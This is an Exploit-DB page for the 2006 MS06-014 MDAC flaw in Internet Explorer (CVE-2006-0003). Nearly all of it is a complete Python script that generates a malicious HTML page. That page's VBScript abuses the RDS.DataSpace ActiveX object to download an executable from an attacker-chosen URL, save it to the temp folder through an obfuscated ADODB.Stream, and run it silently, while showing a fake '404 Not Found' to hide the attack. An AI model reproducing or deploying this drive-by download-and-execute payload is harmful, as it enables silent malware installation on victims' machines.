Microsoft Internet Explorer - MDAC Remote Code Execution (MS06-014)

EDB-ID:

2052

CVE:

2006-0003

EDB Verified:

Author:

redsand

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2006-07-21

Vulnerable App: 
#!/bin/sh -
"exec" "python" "-O" "$0" "$@"

__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVS-2006-0003
MS06-014

April 2006

*** this is a bit out-dated, but works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html

Now upload index.html to the same webserver hosting your
http://omfg.what.ho.st/~user/stage2.exe 

                            - redsand@blacksecurity.org
"""

__version__ = "1.0"

import sys, random

class MS06014:
    
    __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"


    __html = """
    <title></title>
    <head></head>

    <body>

    <script language="VBScript">

    on error resume next

    BL4CK_PAYLOAD

    </script>
    <head>
    <title>[BL4CK] || 404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    pwn3d!!
    <hr>
    <!-- <script>location.href='http://google.com'</script> -->
    </body>

    </html>

    """

    __payload = """

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "URLFILE"

    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1

    ' xml ajax req
    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' Get temp directory and create our destination name
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    ' open adodb stream and write contents of request to file
    ' like vbs dl+exec code
    S.write x.responseBody
    ' Saves it with CreateOverwrite flag
    S.savetofile fname1,2

    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

    """

    def	__init__(self, file):

	self.__file = file



    def bl4ck(self):
	self.__payload = self.__payload.replace("URLFILE",self.__file)

	encoded = self.__payload

	ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

	return ret


if __name__ == '__main__':

	url=False
	out=False

	print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
	print "url path to file must be on the same domain as the htm file"
	print "http://blacksecurity.org\r\n"


	argc = len(sys.argv)
	if(argc <= 2):
        	print "USAGE: %s <download url> <outfile>" % sys.argv[0]
        	sys.exit(0)
	if(argc > 1):
       		url = sys.argv[1]
	if(argc > 2):
        	out = sys.argv[2]

        ms = MS06014(url)

       	ret = ms.bl4ck()


	try:
	    fsock = open(out, "w+", 0)
	    try:
	        fsock.write(ret );
	    finally:
	        fsock.close()
	except IOError:
	    pass

	print "Wrote %r bytes to: %s" % (len(ret),out)

# milw0rm.com [2006-07-21]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services